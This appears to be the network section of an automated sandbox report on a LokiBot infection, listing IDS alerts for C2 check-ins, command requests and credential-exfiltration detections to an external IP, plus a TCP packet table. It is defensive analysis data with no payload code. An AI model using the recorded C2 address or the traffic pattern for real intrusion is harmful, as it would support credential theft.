04/06/24-09:29:51.920859	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49756	80	192.168.2.6	172.67.148.126
04/06/24-09:30:41.966393	TCP	2025381	ET TROJAN LokiBot Checkin	49820	80	192.168.2.6	172.67.148.126
04/06/24-09:30:49.735329	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49830	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.081982	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49797	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.865138	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49834	80	192.168.2.6	172.67.148.126
04/06/24-09:30:55.220105	TCP	2025381	ET TROJAN LokiBot Checkin	49837	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.865138	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49834	80	192.168.2.6	172.67.148.126
04/06/24-09:29:51.920859	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49756	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.891670	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49774	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.891670	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.6	172.67.148.126
04/06/24-09:31:08.547895	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49852	80	192.168.2.6	172.67.148.126
04/06/24-09:29:46.581121	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49751	80	192.168.2.6	172.67.148.126
04/06/24-09:29:33.293191	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49728	80	192.168.2.6	172.67.148.126
04/06/24-09:30:35.733011	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49812	80	192.168.2.6	172.67.148.126
04/06/24-09:29:33.293191	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49728	80	192.168.2.6	172.67.148.126
04/06/24-09:30:44.269499	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49823	80	192.168.2.6	172.67.148.126
04/06/24-09:29:29.470677	TCP	2025381	ET TROJAN LokiBot Checkin	49724	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.975531	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49811	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.921065	TCP	2025381	ET TROJAN LokiBot Checkin	49765	80	192.168.2.6	172.67.148.126
04/06/24-09:31:08.547895	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49852	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.035047	TCP	2025381	ET TROJAN LokiBot Checkin	49760	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.079276	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49729	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.975531	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49811	80	192.168.2.6	172.67.148.126
04/06/24-09:29:39.580792	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.6	172.67.148.126
04/06/24-09:31:03.891737	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49846	80	192.168.2.6	172.67.148.126
04/06/24-09:30:39.686953	TCP	2025381	ET TROJAN LokiBot Checkin	49819	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.194950	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49870	80	192.168.2.6	172.67.148.126
04/06/24-09:30:30.339047	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49805	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.194950	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49870	80	192.168.2.6	172.67.148.126
04/06/24-09:30:13.652600	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49784	80	192.168.2.6	172.67.148.126
04/06/24-09:29:25.556361	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49719	80	192.168.2.6	172.67.148.126
04/06/24-09:29:28.699735	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49723	80	192.168.2.6	172.67.148.126
04/06/24-09:30:42.736556	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49821	80	192.168.2.6	172.67.148.126
04/06/24-09:31:18.590588	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49864	80	192.168.2.6	172.67.148.126
04/06/24-09:30:09.757970	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49777	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.972978	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49787	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.204192	TCP	2025381	ET TROJAN LokiBot Checkin	49810	80	192.168.2.6	172.67.148.126
04/06/24-09:31:17.815577	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49863	80	192.168.2.6	172.67.148.126
04/06/24-09:30:15.972978	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49787	80	192.168.2.6	172.67.148.126
04/06/24-09:30:42.736556	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49821	80	192.168.2.6	172.67.148.126
04/06/24-09:30:53.641650	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49835	80	192.168.2.6	172.67.148.126
04/06/24-09:29:26.328739	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49720	80	192.168.2.6	172.67.148.126
04/06/24-09:30:54.422589	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49836	80	192.168.2.6	172.67.148.126
04/06/24-09:29:36.488685	TCP	2025381	ET TROJAN LokiBot Checkin	49737	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.042075	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49824	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.814837	TCP	2025381	ET TROJAN LokiBot Checkin	49770	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.124910	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.042075	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49824	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.862546	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49798	80	192.168.2.6	172.67.148.126
04/06/24-09:31:04.659572	TCP	2025381	ET TROJAN LokiBot Checkin	49847	80	192.168.2.6	172.67.148.126
04/06/24-09:30:41.966393	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49820	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.096160	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49833	80	192.168.2.6	172.67.148.126
04/06/24-09:29:54.259588	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49759	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.801533	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49825	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.891260	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.112021	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49788	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.136720	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49866	80	192.168.2.6	172.67.148.126
04/06/24-09:30:32.673178	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49808	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.897343	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49860	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.839758	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49718	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.999341	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49850	80	192.168.2.6	172.67.148.126
04/06/24-09:29:54.259588	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.6	172.67.148.126
04/06/24-09:29:56.595283	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.6	172.67.148.126
04/06/24-09:29:35.705322	TCP	2025381	ET TROJAN LokiBot Checkin	49734	80	192.168.2.6	172.67.148.126
04/06/24-09:30:43.503603	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49822	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.839758	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49718	80	192.168.2.6	172.67.148.126
04/06/24-09:29:44.242163	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49748	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.895022	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49789	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.018070	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49749	80	192.168.2.6	172.67.148.126
04/06/24-09:30:51.314444	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49832	80	192.168.2.6	172.67.148.126
04/06/24-09:29:44.242163	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.6	172.67.148.126
04/06/24-09:30:13.652600	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49784	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.860100	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.6	172.67.148.126
04/06/24-09:30:14.423119	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49785	80	192.168.2.6	172.67.148.126
04/06/24-09:30:51.314444	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49832	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.115114	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49744	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.895022	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49789	80	192.168.2.6	172.67.148.126
04/06/24-09:31:14.663983	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49861	80	192.168.2.6	172.67.148.126
04/06/24-09:30:23.301208	TCP	2025381	ET TROJAN LokiBot Checkin	49796	80	192.168.2.6	172.67.148.126
04/06/24-09:29:40.344957	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.6	172.67.148.126
04/06/24-09:29:40.344957	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.6	172.67.148.126
04/06/24-09:30:56.772335	TCP	2025381	ET TROJAN LokiBot Checkin	49839	80	192.168.2.6	172.67.148.126
04/06/24-09:31:01.546959	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49843	80	192.168.2.6	172.67.148.126
04/06/24-09:31:09.316933	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49853	80	192.168.2.6	172.67.148.126
04/06/24-09:30:18.674487	TCP	2025381	ET TROJAN LokiBot Checkin	49790	80	192.168.2.6	172.67.148.126
04/06/24-09:31:07.768549	TCP	2025381	ET TROJAN LokiBot Checkin	49851	80	192.168.2.6	172.67.148.126
04/06/24-09:29:24.137227	TCP	2025381	ET TROJAN LokiBot Checkin	49717	80	192.168.2.6	172.67.148.126
04/06/24-09:30:26.424765	TCP	2025381	ET TROJAN LokiBot Checkin	49800	80	192.168.2.6	172.67.148.126
04/06/24-09:30:29.547586	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49804	80	192.168.2.6	172.67.148.126
04/06/24-09:30:45.801533	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49825	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.128553	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.961991	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49871	80	192.168.2.6	172.67.148.126
04/06/24-09:30:10.531874	TCP	2025381	ET TROJAN LokiBot Checkin	49778	80	192.168.2.6	172.67.148.126
04/06/24-09:30:29.547586	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49804	80	192.168.2.6	172.67.148.126
04/06/24-09:31:19.370644	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49865	80	192.168.2.6	172.67.148.126
04/06/24-09:31:20.907030	TCP	2025381	ET TROJAN LokiBot Checkin	49867	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.117986	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49859	80	192.168.2.6	172.67.148.126
04/06/24-09:30:08.980641	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49776	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.861151	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.6	172.67.148.126
04/06/24-09:31:19.370644	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49865	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.133120	TCP	2025381	ET TROJAN LokiBot Checkin	49806	80	192.168.2.6	172.67.148.126
04/06/24-09:30:08.980641	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49776	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.128553	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49764	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.961991	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49871	80	192.168.2.6	172.67.148.126
04/06/24-09:31:09.316933	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49853	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.206304	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49792	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.862546	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49798	80	192.168.2.6	172.67.148.126
04/06/24-09:31:13.117986	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49859	80	192.168.2.6	172.67.148.126
04/06/24-09:31:22.429106	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49869	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.861151	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49782	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.096911	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49781	80	192.168.2.6	172.67.148.126
04/06/24-09:30:12.096911	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49781	80	192.168.2.6	172.67.148.126
04/06/24-09:30:37.305241	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49815	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.206304	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49792	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.046578	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49769	80	192.168.2.6	172.67.148.126
04/06/24-09:29:47.378472	TCP	2025381	ET TROJAN LokiBot Checkin	49752	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.046578	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.6	172.67.148.126
04/06/24-09:30:49.735329	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49830	80	192.168.2.6	172.67.148.126
04/06/24-09:29:38.799315	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.986411	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49802	80	192.168.2.6	172.67.148.126
04/06/24-09:30:59.991734	TCP	2025381	ET TROJAN LokiBot Checkin	49841	80	192.168.2.6	172.67.148.126
04/06/24-09:31:02.332845	TCP	2025381	ET TROJAN LokiBot Checkin	49844	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.799677	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.6	172.67.148.126
04/06/24-09:29:48.178974	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49753	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.957388	TCP	2025381	ET TROJAN LokiBot Checkin	49829	80	192.168.2.6	172.67.148.126
04/06/24-09:29:51.123133	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.6	172.67.148.126
04/06/24-09:31:00.769505	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49842	80	192.168.2.6	172.67.148.126
04/06/24-09:30:22.504191	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49795	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.079276	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49729	80	192.168.2.6	172.67.148.126
04/06/24-09:30:47.361321	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49827	80	192.168.2.6	172.67.148.126
04/06/24-09:31:22.429106	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49869	80	192.168.2.6	172.67.148.126
04/06/24-09:30:21.735500	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49794	80	192.168.2.6	172.67.148.126
04/06/24-09:30:47.361321	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49827	80	192.168.2.6	172.67.148.126
04/06/24-09:31:00.769505	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49842	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.861510	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49818	80	192.168.2.6	172.67.148.126
04/06/24-09:29:48.178974	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49753	80	192.168.2.6	172.67.148.126
04/06/24-09:30:21.735500	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49794	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.799677	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49750	80	192.168.2.6	172.67.148.126
04/06/24-09:30:19.440133	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49791	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.986411	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49802	80	192.168.2.6	172.67.148.126
04/06/24-09:30:11.314149	TCP	2025381	ET TROJAN LokiBot Checkin	49780	80	192.168.2.6	172.67.148.126
04/06/24-09:29:31.298967	TCP	2025381	ET TROJAN LokiBot Checkin	49727	80	192.168.2.6	172.67.148.126
04/06/24-09:30:36.516498	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49814	80	192.168.2.6	172.67.148.126
04/06/24-09:30:37.305241	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49815	80	192.168.2.6	172.67.148.126
04/06/24-09:29:30.251229	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49725	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.080334	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49855	80	192.168.2.6	172.67.148.126
04/06/24-09:31:11.610579	TCP	2025381	ET TROJAN LokiBot Checkin	49857	80	192.168.2.6	172.67.148.126
04/06/24-09:31:01.546959	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49843	80	192.168.2.6	172.67.148.126
04/06/24-09:29:59.690030	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.846749	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49856	80	192.168.2.6	172.67.148.126
04/06/24-09:30:22.504191	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49795	80	192.168.2.6	172.67.148.126
04/06/24-09:30:36.516498	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49814	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.088060	TCP	2025381	ET TROJAN LokiBot Checkin	49816	80	192.168.2.6	172.67.148.126
04/06/24-09:30:00.493399	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49767	80	192.168.2.6	172.67.148.126
04/06/24-09:29:59.690030	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49766	80	192.168.2.6	172.67.148.126
04/06/24-09:30:01.279270	TCP	2025381	ET TROJAN LokiBot Checkin	49768	80	192.168.2.6	172.67.148.126
04/06/24-09:31:10.080334	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49855	80	192.168.2.6	172.67.148.126
04/06/24-09:29:30.251229	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49725	80	192.168.2.6	172.67.148.126

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 6, 2024 09:29:24.010575056 CEST	49717	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:24.134854078 CEST	80	49717	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:24.134974957 CEST	49717	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:24.137227058 CEST	49717	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:24.261346102 CEST	80	49717	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:24.261514902 CEST	49717	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:24.385816097 CEST	80	49717	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:24.653399944 CEST	80	49717	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:24.653533936 CEST	49717	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:24.654429913 CEST	80	49717	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:24.654491901 CEST	49717	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:24.713296890 CEST	49718	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:24.779493093 CEST	80	49717	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:24.837235928 CEST	80	49718	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:24.837327957 CEST	49718	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:24.839757919 CEST	49718	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:24.963665009 CEST	80	49718	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:24.963792086 CEST	49718	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:25.087979078 CEST	80	49718	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:25.361860991 CEST	80	49718	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:25.362015009 CEST	49718	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:25.362027884 CEST	80	49718	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:25.362072945 CEST	49718	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:25.429287910 CEST	49719	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:25.486277103 CEST	80	49718	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:25.554042101 CEST	80	49719	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:25.554176092 CEST	49719	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:25.556360960 CEST	49719	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:25.685225010 CEST	80	49719	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:25.685328007 CEST	49719	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:25.811079025 CEST	80	49719	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.063576937 CEST	80	49719	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.063747883 CEST	49719	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:26.063848972 CEST	80	49719	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.063898087 CEST	49719	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:26.188164949 CEST	80	49719	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.202606916 CEST	49720	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:26.326373100 CEST	80	49720	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.326536894 CEST	49720	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:26.328738928 CEST	49720	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:26.452440977 CEST	80	49720	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.452619076 CEST	49720	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:26.576917887 CEST	80	49720	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.844019890 CEST	80	49720	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.844155073 CEST	49720	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:26.844314098 CEST	80	49720	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.844363928 CEST	49720	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:26.968004942 CEST	80	49720	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:26.983146906 CEST	49721	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:27.107435942 CEST	80	49721	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:27.107558966 CEST	49721	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:27.109786987 CEST	49721	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:27.233928919 CEST	80	49721	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:27.234020948 CEST	49721	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:27.358174086 CEST	80	49721	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:27.639862061 CEST	80	49721	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:27.639986992 CEST	49721	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:27.640588045 CEST	80	49721	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:27.640651941 CEST	49721	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:27.764014959 CEST	80	49721	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:27.779928923 CEST	49722	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:27.903629065 CEST	80	49722	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:27.903841972 CEST	49722	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:27.906070948 CEST	49722	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:28.029750109 CEST	80	49722	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:28.029813051 CEST	49722	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:28.153486967 CEST	80	49722	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:28.413724899 CEST	80	49722	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:28.413861990 CEST	49722	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:28.414184093 CEST	80	49722	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:28.414242983 CEST	49722	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:28.537666082 CEST	80	49722	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:28.573250055 CEST	49723	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:28.697454929 CEST	80	49723	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:28.697601080 CEST	49723	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:28.699734926 CEST	49723	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:28.823865891 CEST	80	49723	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:28.823987007 CEST	49723	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:28.948112011 CEST	80	49723	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:29.197910070 CEST	80	49723	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:29.198033094 CEST	49723	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:29.198896885 CEST	80	49723	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:29.198945045 CEST	49723	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:29.322170019 CEST	80	49723	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:29.344439030 CEST	49724	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:29.468365908 CEST	80	49724	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:29.468483925 CEST	49724	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:29.470676899 CEST	49724	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:29.594594002 CEST	80	49724	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:29.594660997 CEST	49724	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:29.718596935 CEST	80	49724	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:29.977092981 CEST	80	49724	172.67.148.126	192.168.2.6
